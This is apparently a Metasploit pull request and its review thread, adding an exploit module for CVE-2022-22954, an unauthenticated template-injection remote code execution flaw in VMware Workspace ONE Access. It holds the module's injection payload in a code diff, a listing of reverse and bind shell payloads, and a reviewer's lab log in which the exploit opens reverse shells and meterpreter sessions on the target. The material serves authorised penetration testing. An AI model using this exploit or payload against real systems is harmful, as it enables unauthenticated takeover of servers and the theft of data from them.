### PR TITLE
Add VMware Workspace ONE Access CVE-2022-22954

### PR DESCRIPTION
**Pull request by wvu**
```
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > info

       Name: VMware Workspace ONE Access CVE-2022-22954
     Module: exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-04-06

Provided by:
  mr_me
  Udhaya Prakash
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits CVE-2022-22954, an unauthenticated server-side
  template injection (SSTI) in VMware Workspace ONE Access, to execute
  shell commands as the "horizon" user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-22954
  https://www.vmware.com/security/advisories/VMSA-2022-0011.html
  https://srcincite.io/advisories/src-2022-0005/
  https://github.com/sherlocksecurity/VMware-CVE-2022-22954
  https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) >
```

### CODE REVIEW

**Comment by wvu** [comment]
Okay, please take this away from me. I'm done with it.

File: modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb [hunk 1]
```diff
@@ -0,0 +1,139 @@
...
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, ssti_uri),
+      'vhost' => rand_text_alphanumeric(8..16),
+      'vars_get' => {
+        %w[code error].sample => rand_text_alphanumeric(8..16),
+        # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html
+        ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
+      }
+    }, 3.5)
```
Comment (smcintyre-r7) [inline modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb:118]: This is a pretty specific timeout value. Is this just the ideal value for some reason? I see in the check method you're able to get the token out, so it's not necessary to have a timeout used for some kind of sleep.

I thought I'd ask, but I'll test this with the default value. Everything else looks good to me :+1: .

**Comment by smcintyre-r7** [comment]
Module works great. I tested the default ARCH_CMD payload, a Python meterpreter and the Linux dropper target. Each one worked as intended on the first try :tada: .

<details>
<summary>Testing Output</summary>

```
msf6 > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 

Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set RHOSTS 192.168.159.98
RHOSTS => 192.168.159.98
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > check
[+] 192.168.159.98:443 - The target is vulnerable.
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.98:38984) at 2022-05-03 09:38:41 -0400

id
uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
exit
[*] 192.168.159.98 - Command shell session 1 closed.
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper


msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set PAYLOAD cmd/unix/
set PAYLOAD cmd/unix/bind_awk                             set PAYLOAD cmd/unix/generic                              set PAYLOAD cmd/unix/python/shell_bind_tcp                set PAYLOAD cmd/unix/reverse_openssl
set PAYLOAD cmd/unix/bind_busybox_telnetd                 set PAYLOAD cmd/unix/pingback_bind                        set PAYLOAD cmd/unix/python/shell_reverse_tcp             set PAYLOAD cmd/unix/reverse_perl
set PAYLOAD cmd/unix/bind_jjs                             set PAYLOAD cmd/unix/pingback_reverse                     set PAYLOAD cmd/unix/python/shell_reverse_tcp_ssl         set PAYLOAD cmd/unix/reverse_perl_ssl
set PAYLOAD cmd/unix/bind_lua                             set PAYLOAD cmd/unix/python/meterpreter/bind_tcp          set PAYLOAD cmd/unix/python/shell_reverse_udp             set PAYLOAD cmd/unix/reverse_php_ssl
set PAYLOAD cmd/unix/bind_netcat                          set PAYLOAD cmd/unix/python/meterpreter/bind_tcp_uuid     set PAYLOAD cmd/unix/reverse                              set PAYLOAD cmd/unix/reverse_python
set PAYLOAD cmd/unix/bind_netcat_gaping                   set PAYLOAD cmd/unix/python/meterpreter/reverse_http      set PAYLOAD cmd/unix/reverse_awk                          set PAYLOAD cmd/unix/reverse_python_ssl
set PAYLOAD cmd/unix/bind_netcat_gaping_ipv6              set PAYLOAD cmd/unix/python/meterpreter/reverse_https     set PAYLOAD cmd/unix/reverse_bash                         set PAYLOAD cmd/unix/reverse_r
set PAYLOAD cmd/unix/bind_nodejs                          set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp       set PAYLOAD cmd/unix/reverse_bash_telnet_ssl              set PAYLOAD cmd/unix/reverse_ruby
set PAYLOAD cmd/unix/bind_perl                            set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp_ssl   set PAYLOAD cmd/unix/reverse_bash_udp                     set PAYLOAD cmd/unix/reverse_ruby_ssl
set PAYLOAD cmd/unix/bind_perl_ipv6                       set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp_uuid  set PAYLOAD cmd/unix/reverse_jjs                          set PAYLOAD cmd/unix/reverse_socat_udp
set PAYLOAD cmd/unix/bind_r                               set PAYLOAD cmd/unix/python/meterpreter_bind_tcp          set PAYLOAD cmd/unix/reverse_ksh                          set PAYLOAD cmd/unix/reverse_ssh
set PAYLOAD cmd/unix/bind_ruby                            set PAYLOAD cmd/unix/python/meterpreter_reverse_http      set PAYLOAD cmd/unix/reverse_lua                          set PAYLOAD cmd/unix/reverse_ssl_double_telnet
set PAYLOAD cmd/unix/bind_ruby_ipv6                       set PAYLOAD cmd/unix/python/meterpreter_reverse_https     set PAYLOAD cmd/unix/reverse_ncat_ssl                     set PAYLOAD cmd/unix/reverse_stub
set PAYLOAD cmd/unix/bind_socat_udp                       set PAYLOAD cmd/unix/python/meterpreter_reverse_tcp       set PAYLOAD cmd/unix/reverse_netcat                       set PAYLOAD cmd/unix/reverse_tclsh
set PAYLOAD cmd/unix/bind_stub                            set PAYLOAD cmd/unix/python/pingback_bind_tcp             set PAYLOAD cmd/unix/reverse_netcat_gaping                set PAYLOAD cmd/unix/reverse_zsh
set PAYLOAD cmd/unix/bind_zsh                             set PAYLOAD cmd/unix/python/pingback_reverse_tcp          set PAYLOAD cmd/unix/reverse_nodejs                       
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 

Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.98   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (40060 bytes) to 192.168.159.98
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.98:38990) at 2022-05-03 09:39:00 -0400

meterpreter > getuid
Server username: horizon
meterpreter > background 
[*] Backgrounding session 2...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set TARGET Linux\ Dropper 
TARGET => Linux Dropper
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing linux/x64/meterpreter/reverse_tcp (Linux Dropper)
[*] Sending stage (3020772 bytes) to 192.168.159.98
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.98:38994) at 2022-05-03 09:39:19 -0400

meterpreter > getuid
Server username: horizon
meterpreter > sysinfo
Computer     : 192.168.159.98
OS           : VMware Photon OS 3.0 (Linux 4.19.217-1.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
</details>

File: modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb (hunk 1 above)
Comment (smcintyre-r7) [reply modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb:118]: Ah I see that some of the payloads are not returning immediately, so this timeout makes the module more responsive.

I'll mark this as resolved and get it landed. Thanks!

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.

File: modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb (hunk 1 above)
Comment (wvu) [reply modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb:118]: Hah, it's somewhat ideal but also a Metasploit inside joke that's probably forgotten now. I usually make it configurable for long-running commands returning output, but that's not the case here. I'm glad you asked!

**Comment by wvu** [comment]
Wow, you're fast! Thanks, @smcintyre-r7!

File: modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb (hunk 1 above)
Comment (wvu) [reply modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb:118]: Properly handled in #16525.

**Pull request merged**